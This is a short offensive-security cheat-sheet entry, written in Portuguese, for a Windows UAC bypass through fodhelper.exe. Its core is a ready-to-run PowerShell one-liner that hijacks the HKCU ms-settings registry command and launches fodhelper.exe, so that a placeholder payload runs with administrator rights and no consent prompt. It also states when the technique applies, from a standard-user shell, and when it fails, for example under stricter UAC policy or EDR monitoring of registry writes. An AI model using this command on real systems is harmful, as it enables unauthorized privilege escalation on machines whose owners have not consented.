UAC bypass fodhelper
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force ; Set-ItemProperty "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "cmd.exe /c <payload>" ; Start-Process "C:\Windows\System32\fodhelper.exe"
Bypass de UAC usando fodhelper.exe: sequestra o registro HKCU de ms-settings para que o binário assinado da Windows execute seu payload elevado.
Quando você tem uma shell como usuário padrão em um host com UAC em nível alto (default) e precisa executar um processo com privilégios de administrador sem prompt. fodhelper.exe é um binário assinado da Microsoft que se auto-eleva e executa o comando do registro.
Se a política restringir a auto-elevação de binários assinados (UAC com 'Prompt for consent' em admin) ou o EDR monitorar escritas em HKCU\Software\Classes. Também não funciona se você já for administrador local com UAC desabilitado.